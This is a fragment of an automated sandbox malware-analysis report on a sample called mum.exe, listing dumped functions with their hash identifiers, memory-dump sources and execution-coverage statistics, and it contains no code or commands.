Opcode Fuzzy Hash: 2851bbf1bce087b010b6d826fe29395f3ea65a4c4e9fa1d400cb6bda6c5f16f9
Instruction Fuzzy Hash: DE01A731008764DAEB518A25F884B67BFD8DF52724F24C456EE045A183D374DC60C6B1

Uniqueness

Uniqueness Score: -1.00%

Function 00279C4C Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.988801809.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_270000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3b24051cea626134461c6f2efa9291fcdf562058c9334cb601264c057d6a24a
Instruction ID: 604159b8930cabd9032e244f5b87a911002662798383d36afd3923f69fa43b55
Opcode Fuzzy Hash: b3b24051cea626134461c6f2efa9291fcdf562058c9334cb601264c057d6a24a
Instruction Fuzzy Hash: 21111274A2430ACBCF10DFA9E8446AEB7F5BB19300F14846AE409EB250EBB09994DF11

Uniqueness

Uniqueness Score: -1.00%

Function 00279DFB Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.988801809.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_270000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 588d4abd63464174e6aea44993b30bc6bfe5eaa70f784d5ea2b83ebfe6f47065
Instruction ID: 7ad4050037f916e34a017c87999b04a86007a448fac1ced73c33487dcedf1937
Opcode Fuzzy Hash: 588d4abd63464174e6aea44993b30bc6bfe5eaa70f784d5ea2b83ebfe6f47065
Instruction Fuzzy Hash: 8801487493431ACBCF21CFA8DC442ADBBF9BB19300F20956AD45ED7201EBB189A48A41

Uniqueness

Uniqueness Score: -1.00%

Function 002707F8 Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.988801809.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_270000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 260d91e8b7d4fda98bcccd8e021dbf3c36a20832ec39a4c04061478d68394f1f
Instruction ID: 2a2d136dd92e6dd2f0248f43b3db0d1589fb21b02b9e80ca269717b756aaafc0
Opcode Fuzzy Hash: 260d91e8b7d4fda98bcccd8e021dbf3c36a20832ec39a4c04061478d68394f1f
Instruction Fuzzy Hash: F7015A30E1420ACBDB14DFA4C554BAEBBF9AB4C304F20402AD506F7784DBB599548BE1

Uniqueness

Uniqueness Score: -1.00%

Function 00271F89 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.988801809.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_270000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08302642ebfd7a5222e9d7f907a1c5f9f52607b1240c2b292d2a7862ce1fbed7
Instruction ID: 1aed78963f074a49e9c8c441aa38d3c0b78283cb24b86ee39ce17e40ebe50c10
Opcode Fuzzy Hash: 08302642ebfd7a5222e9d7f907a1c5f9f52607b1240c2b292d2a7862ce1fbed7
Instruction Fuzzy Hash: 43F0AF757052544FC745EB7DD81891E3BE29FC922131640B6E90ACB3B2EE34CC468F91

Uniqueness

Uniqueness Score: -1.00%

Function 0027041F Relevance: .0, Instructions: 38COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.988801809.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_270000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54c8a4b330647b2e6c9f6601047e5a25ed8d998cc3163582b11211c3aeb48e7e
Instruction ID: 67a50af10b5a7d9a85a35e86bba560af05ea381ac3679381f31748b405194996
Opcode Fuzzy Hash: 54c8a4b330647b2e6c9f6601047e5a25ed8d998cc3163582b11211c3aeb48e7e
Instruction Fuzzy Hash: 56F0EC2120D6A01FC702A7788C6199A3F708D8315530901EBC449CF2E3CF295C0A87F6

Uniqueness

Uniqueness Score: -1.00%

Function 00271982 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.988801809.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_270000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7579a3bb8e057d10e17b7c82a85db94e15c90a37e2ae77de399e1831fb072b82
Instruction ID: df19ed66847e1811202a8112659bb6a6c28467622ea2950767462188cccd18ca
Opcode Fuzzy Hash: 7579a3bb8e057d10e17b7c82a85db94e15c90a37e2ae77de399e1831fb072b82
Instruction Fuzzy Hash: 4DF09E317001004FCB10EA7EE894ADE3BE5CFC4344B018075E249C7651EB308C628651

Uniqueness

Uniqueness Score: -1.00%

Function 0012D1C0 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.988414457.000000000012D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0012D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_12d000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8635ddb1d5233a5faffaca29b35bfe9785b8198cd237f81590c5b20622e5039d
Instruction ID: 98dfda3699d07c1a9d0fed1b1cd51445bae19416d4348c910cd839c3061d7363
Opcode Fuzzy Hash: 8635ddb1d5233a5faffaca29b35bfe9785b8198cd237f81590c5b20622e5039d
Instruction Fuzzy Hash: C6F06272404754AEEB518E15E888B66FFD8EF92734F28C55AED085B282C378DC54CBB1

Uniqueness

Uniqueness Score: -1.00%

Function 0535640F Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1002921192.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5350000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6f5b1fd01aa65e8ee69a303b4f37986b428cf6e658b427abf3f3d38e4a21c8ca
Instruction ID: d0283bab272bf8c514e0d6502fd4be0994c5d16796f258edf80f452ce2b27d60
Opcode Fuzzy Hash: 6f5b1fd01aa65e8ee69a303b4f37986b428cf6e658b427abf3f3d38e4a21c8ca
Instruction Fuzzy Hash: 64F08C35949208EFCB06CFA8D894ACDBFB0EF09320F1081DAE84597361C6358E99DF41

Uniqueness

Uniqueness Score: -1.00%

Function 00279E66 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.988801809.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_270000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 401aea185ccd1665807d06426cac432b7cad19d2e64398e8b093ddd142587f19
Instruction ID: 9311176c2a8cc03da800c6136f47066c42e3181be0746b0ec477905fa6885a1e
Opcode Fuzzy Hash: 401aea185ccd1665807d06426cac432b7cad19d2e64398e8b093ddd142587f19
Instruction Fuzzy Hash: E101FB3496424BCFCB20DF68D858BBC7BB1FB15310F0541BAD41AA7655EBB04984EF15

Uniqueness

Uniqueness Score: -1.00%

Function 053566BA Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1002921192.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5350000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e7cacb2da11513fcd9ad3469a6b37f080e1b89d20cf58ebee04a45f902a860c
Instruction ID: 01fc085f3549cc706f72e7e8441afc95f795e3eec8cd5cb9a2d113506e0e2119
Opcode Fuzzy Hash: 6e7cacb2da11513fcd9ad3469a6b37f080e1b89d20cf58ebee04a45f902a860c
Instruction Fuzzy Hash: 8AF0F871D09248AFCB09CFA8D8416CDBFB0AB16310F1481EAD804A73A1D6394A59DF41

Uniqueness

Uniqueness Score: -1.00%

Function 053563A0 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1002921192.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5350000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 79df79fef7619716d93984f77ee63be00467504257e83e770d44115a844aff77
Instruction ID: 4da071f44d932659078215e5df2b228ff22c9f0edb86dfd6cbcb017c47c97be3
Opcode Fuzzy Hash: 79df79fef7619716d93984f77ee63be00467504257e83e770d44115a844aff77
Instruction Fuzzy Hash: C0F01C30D49348EFD705DBB8985558DBFB1AF05310F1481EED454DB2A2D6384A85DB82

Uniqueness

Uniqueness Score: -1.00%

Function 05356528 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1002921192.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5350000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18e0ddc93cd90d98edb035bb55f3fe388dcfb158a3d85fc4287e8b68d00d25af
Instruction ID: 3f12783fa190242ae328fca50f242dce9b400224abb24950daafb6b7283cab4d
Opcode Fuzzy Hash: 18e0ddc93cd90d98edb035bb55f3fe388dcfb158a3d85fc4287e8b68d00d25af
Instruction Fuzzy Hash: C4E092708192889FCB42CFBCD8956DDBFB0AF1A211F1401DAC844D7352DA700949DB11

Uniqueness

Uniqueness Score: -1.00%

Function 05356460 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1002921192.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5350000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1bafb86d5cbeb280e01b834462ed2a329e0805efe123f8220de093a1c1cb0120
Instruction ID: 6134841c3bd56bb60009994b4971faf79ceadd66dd0fc84eb7b0b465c2709110
Opcode Fuzzy Hash: 1bafb86d5cbeb280e01b834462ed2a329e0805efe123f8220de093a1c1cb0120
Instruction Fuzzy Hash: 77F0A934808248EFCB02CFA8D884E9EBFB0AF0A211F1481DAF885A7372C2704954EF50

Uniqueness

Uniqueness Score: -1.00%

Function 05359330 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1002921192.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5350000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 967c31caa56afc7e8e3de03420ac812c057b397e87ef4e6895221906284ec131
Instruction ID: f278225007279466e879f1b7c720d121ad9f2abd39eccd50e3e09d18236480ba
Opcode Fuzzy Hash: 967c31caa56afc7e8e3de03420ac812c057b397e87ef4e6895221906284ec131
Instruction Fuzzy Hash: EBF0A53590420CEFCB05DF98D941A9DBBB5FB48310F14C199ED1867351C7729A61EF81

Uniqueness

Uniqueness Score: -1.00%

Function 053572F2 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1002921192.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5350000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35043d7db2149fbb5ded89d5204d0eca888b1563e2c45fb65e4bf28bd9548e03
Instruction ID: 0b6293716d2ae1b2b3a119991f31c58440f12b261aedf3c2bd6792b9dc090e51
Opcode Fuzzy Hash: 35043d7db2149fbb5ded89d5204d0eca888b1563e2c45fb65e4bf28bd9548e03
Instruction Fuzzy Hash: EEE04F308492489FCB05CBA8989599EBF70AB47211F1451DED905632A1D7740D0ADB91

Uniqueness

Uniqueness Score: -1.00%

Function 00273618 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.988801809.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_270000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0e7f46c4f5225c2e7124dfab6ec7ae35d7ba26067f2181748472d2a4cc684c3
Instruction ID: 31bfe581ee236efe2da4a642298bcc59e8a025b90c1493c975601a969e9545eb
Opcode Fuzzy Hash: b0e7f46c4f5225c2e7124dfab6ec7ae35d7ba26067f2181748472d2a4cc684c3
Instruction Fuzzy Hash: 24E04830800208EFCB04EF94D90959DBB75FF46301F548154E84853350C7705E64DF95

Uniqueness

Uniqueness Score: -1.00%

Function 002716D1 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.988801809.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_270000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c652eeeb1b9487a6b85859c72829a353421d1aacc8e483d1402ab1caf6bf552
Instruction ID: 378b8add7a33692ca446915783695bb910982e6e3379c6f48d67b8f6fab818e3
Opcode Fuzzy Hash: 9c652eeeb1b9487a6b85859c72829a353421d1aacc8e483d1402ab1caf6bf552
Instruction Fuzzy Hash: BDE0123060A3899FC702DF68D9509AC7FB4DF8620471145EED086D7655D7311E558B51

Uniqueness

Uniqueness Score: -1.00%

Function 05356420 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1002921192.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5350000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f7e892c6144c2cc7835c73e202295c5b41c81c2394ea47d42b0fcc762fe09bad
Instruction ID: 811ce4496e856a10f18ed2bb601734d5a865491043bf3610bd43884e169d0c5f
Opcode Fuzzy Hash: f7e892c6144c2cc7835c73e202295c5b41c81c2394ea47d42b0fcc762fe09bad
Instruction Fuzzy Hash: 4AE0C238904208EFCB04DF98D48499CBBB4FB48314F5081A9E94567360C731AE94DF80

Uniqueness

Uniqueness Score: -1.00%

Function 053566C8 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1002921192.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5350000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f319deeeca5e31327df8db2d103bfb531b2c22f2f119e41594ca24875bcd2f87
Instruction ID: 150b25e15cf0ef21eccbb8520cad255b3970fa028a804d44a6c1cb4a1b53ed77
Opcode Fuzzy Hash: f319deeeca5e31327df8db2d103bfb531b2c22f2f119e41594ca24875bcd2f87
Instruction Fuzzy Hash: 2EE01270E0420CEFCB04DFA9D440A9EFBB5EB48300F1082AAE904A3360D7359E54DF81

Uniqueness

Uniqueness Score: -1.00%

Function 00274A26 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.988801809.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_270000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 733878520a0e1dca74414ae0d608b00b6234f606a4b43db4112920915fee473b
Instruction ID: d94f413e1be07b388da9a3b55062ea688eede7a87fd9b94361b64be31d3d8b88
Opcode Fuzzy Hash: 733878520a0e1dca74414ae0d608b00b6234f606a4b43db4112920915fee473b
Instruction Fuzzy Hash: 31F09274E14208DFDB64CFB8C89089CBBB0AF09304B24865ED815A7342D731A812EF04

Uniqueness

Uniqueness Score: -1.00%

Function 05359400 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1002921192.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5350000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7dc9631e83244edfa9541dd039716eba80c4e7d1abfcb36947a87f717e8e0270
Instruction ID: 22edce6d4c1b2c07564320ad5c95c2e5f76a5577fc81d8d04ccb423c93db828d
Opcode Fuzzy Hash: 7dc9631e83244edfa9541dd039716eba80c4e7d1abfcb36947a87f717e8e0270
Instruction Fuzzy Hash: ADE01A74D04208EFCB04DF99D440AACFBB4EB48310F14C1AAEC5463351C6319E51EF84

Uniqueness

Uniqueness Score: -1.00%

Function 05356470 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1002921192.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5350000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66ebd5620dffa75dec804505021eb3e39d6ac6bf8a636ba8f0ab42267000764c
Instruction ID: bafcf8f2ce9510c8c4b85ccc0dad79bcff17854ea8999f0d4165640d5ecfb1cf
Opcode Fuzzy Hash: 66ebd5620dffa75dec804505021eb3e39d6ac6bf8a636ba8f0ab42267000764c
Instruction Fuzzy Hash: F9E01234904208EFCB04DFA8D884A9DBBB4BB09321F109198E90527360CB71AEA4EF80

Uniqueness

Uniqueness Score: -1.00%

Function 053563B0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1002921192.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5350000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07873fb76ae53a52951e7c5ecffe6034cc9710701e3f855bdfd33345c8c73442
Instruction ID: 65f079009cced0036ad54bc63aca684a36bf5ad7342d9b10fe07ce14b45b2027
Opcode Fuzzy Hash: 07873fb76ae53a52951e7c5ecffe6034cc9710701e3f855bdfd33345c8c73442
Instruction Fuzzy Hash: F8E01230E0420CEFDB44EFE8D84169DBBB4AB44300F1081A9D828A3350D7345A44DF80

Uniqueness

Uniqueness Score: -1.00%

Function 05354CA3 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1002921192.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5350000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 86d3077da203ae8025b8d6ee9a3f2061263225dc59d07a4c7d4517b0425415f1
Instruction ID: f1cc31f56948edd9d36d1d7028b62061b04b2b5f9a23e660cc0c54d57b283209
Opcode Fuzzy Hash: 86d3077da203ae8025b8d6ee9a3f2061263225dc59d07a4c7d4517b0425415f1
Instruction Fuzzy Hash: 89F0FDB49012A88FDBA4CF18CD94A9DBBB6BB58301F0041DADA0EA3251EB701EC5CF04

Uniqueness

Uniqueness Score: -1.00%

Function 05356538 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1002921192.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5350000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6184dcbfcda5b5ec855c522077e48e519a5234640d878e0814616eb232fc3e0
Instruction ID: 2511fd577d68711d80cd617b3b31b431a80ad0940a3e5aba746070c2fa6a2656
Opcode Fuzzy Hash: a6184dcbfcda5b5ec855c522077e48e519a5234640d878e0814616eb232fc3e0
Instruction Fuzzy Hash: 43E0E270914208EFCB44EFACD98969DBBB4EB04201F1045A9D808A3350EB705A88EB81

Uniqueness

Uniqueness Score: -1.00%

Function 0027A3E0 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.988801809.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_270000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31fcb57e6b13beef355698891e48a9746345be8b7dd46640cde1dab2eaf457d9
Instruction ID: f4dc0f54df29e80d17199b9df08f463a9a09fe80faf76a26a9ac22929e4c225b
Opcode Fuzzy Hash: 31fcb57e6b13beef355698891e48a9746345be8b7dd46640cde1dab2eaf457d9
Instruction Fuzzy Hash: A2E0E534910209CFEB20DFB8D8489ACBBB1FB58300F20462EE412A3295DBB40985AF42

Uniqueness

Uniqueness Score: -1.00%

Function 00270448 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.988801809.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_270000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 231c34387925a25657b08e7a20a6517f329602bd6b9ef3d3e29fad864cbaa62f
Instruction ID: 3989b1f7bc6f3f4d30711eadb90bc245417c57b9c0fd123132c31820e10c7939
Opcode Fuzzy Hash: 231c34387925a25657b08e7a20a6517f329602bd6b9ef3d3e29fad864cbaa62f
Instruction Fuzzy Hash: 11C0121130453A124D6932F81413A7F31494E8046A300103DD20F5B3D1DF2E9D0302FE

Uniqueness

Uniqueness Score: -1.00%

Function 002716E0 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.988801809.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_270000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 03636c7d38e1d5813fb06140c6d1e9c51c7cc7ddf3bd01e72ca39e5f30230880
Instruction ID: 18fa5c982dd3f82e5767db6317501efee5720408864b2d9637002a737667ca46
Opcode Fuzzy Hash: 03636c7d38e1d5813fb06140c6d1e9c51c7cc7ddf3bd01e72ca39e5f30230880
Instruction Fuzzy Hash: 7AD05E70A0120DEFCB40EFA8EA4189DB7B9EB44204B1045A9E409E7310EB712F219BA4

Uniqueness

Uniqueness Score: -1.00%

Function 05351CA0 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1002921192.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5350000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44b6a22bdda2b5cc7452f1741ab3e5605a18481f8ccd46c1460fbb3c54dd8431
Instruction ID: 35e597b1aa78277ca842be869a08db4cb881f62c3ceb110dd7fb19f4e54d2c41
Opcode Fuzzy Hash: 44b6a22bdda2b5cc7452f1741ab3e5605a18481f8ccd46c1460fbb3c54dd8431
Instruction Fuzzy Hash: DDD05BB480412CCFDB10CF60C848786B7F1FB10300F0450E6C8556B202DB3607559F61

Uniqueness

Uniqueness Score: -1.00%

Function 053510D6 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.1002921192.0000000005350000.00000040.00000800.00020000.00000000.sdmp, Offset: 05350000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_5350000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1a1e5e6c699c4577a1f24e1c8f4ae5e54867ffa5d097c56ac669652ec9cab9c1
Instruction ID: 787ba3b80f0aee90999bb5baaeba3a7d72e3829e64a176a1077bbafb66f37af3
Opcode Fuzzy Hash: 1a1e5e6c699c4577a1f24e1c8f4ae5e54867ffa5d097c56ac669652ec9cab9c1
Instruction Fuzzy Hash: 92E09A70915219CFDB60DF14DC44BD9B776BB54314F005596E40AA7250DBB11BD5CF40

Uniqueness

Uniqueness Score: -1.00%

Function 00273750 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.988801809.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_270000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19a3358f1a48ee49cedee73e8cb4395534348eac6067eb0e7f39c8e498e79cc5
Instruction ID: d74aa9d6b599cd0df72551143960cd0d22127a42a154f0e28a083ee8b36a4ea3
Opcode Fuzzy Hash: 19a3358f1a48ee49cedee73e8cb4395534348eac6067eb0e7f39c8e498e79cc5
Instruction Fuzzy Hash: 51D017B1C18249CBDB60CF65E8148AEBB70FF0A344F10911AC83563292C33405119F02

Uniqueness

Uniqueness Score: -1.00%

Function 002718A8 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.988801809.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_270000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e29c314bdb78890d92b90aacd07e9d4ae17b41d55096b2c0bb3420d534f42d0
Instruction ID: 60208c2e5a510d04a8e2dff3741a0bbfe6c836dd58f52fcadd6cab445dbe9c6b
Opcode Fuzzy Hash: 9e29c314bdb78890d92b90aacd07e9d4ae17b41d55096b2c0bb3420d534f42d0
Instruction Fuzzy Hash: 1AC02B303497018ED3514FF41C042143B8C5E1400434040B5E48CC0823F4008C600302

Uniqueness

Uniqueness Score: -1.00%

Function 0027373D Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.988801809.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_270000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a7030df30ed4e57585759ad0bec5ec0ed4c7205962b7eece30e1608d1aeb6d52
Instruction ID: 56887201826d02c615c8ca674d1280e1a7ece81a2e33c256ced96635bcc84b11
Opcode Fuzzy Hash: a7030df30ed4e57585759ad0bec5ec0ed4c7205962b7eece30e1608d1aeb6d52
Instruction Fuzzy Hash: FCD0CAB8C2820ACBCB14CFA2E9848AEBBB0BB04350B20041A9406A3200C7701A60AE81

Uniqueness

Uniqueness Score: -1.00%

Function 002718B0 Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.988801809.0000000000270000.00000040.00000800.00020000.00000000.sdmp, Offset: 00270000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_270000_mum.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8c1a86c4fa23e1c7a3d62b33afc17b9e499e3523123a256fe42331e0ffc21d7
Instruction ID: 82611be8f379e667fbb2449ff0b642483ddc9c3c5498d58d2102c00931a6fa0d
Opcode Fuzzy Hash: c8c1a86c4fa23e1c7a3d62b33afc17b9e499e3523123a256fe42331e0ffc21d7
Instruction Fuzzy Hash: 21B012303157094A66905FB62D0461277CC5E105043400460A80CC0400F910D8200141

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: mum.exePID: 1484, Parent PID: 2520COMMON

Execution Graph

Execution Coverage:	20.2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	227
Total number of Limit Nodes:	16

Executed Functions

Function 001C2620 Relevance: 1.8, APIs: 1, Instructions: 271
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

KiUserExceptionDispatcher.NTDLL ref: 001C26FC

Memory Dump Source

Source File: 0000001A.00000002.1275842790.00000000001C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_1c0000_mum.jbxd

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: f91345ccb3553325f9c217aef921643cd90b3b20dcd0f7f0689d3895fab83364
Instruction ID: b894c24e11c0e6bd105357ed7a4315224460bb9bcddf65f8c339b376f9195c3e
Opcode Fuzzy Hash: f91345ccb3553325f9c217aef921643cd90b3b20dcd0f7f0689d3895fab83364
Instruction Fuzzy Hash: E6D1C174E00218CFDB14DFA5C994B9DBBB2BF89305F2480AAD809A7365DB359E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 002E8B20 Relevance: 1.8, APIs: 1, Instructions: 268COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 002E8BEB

Memory Dump Source

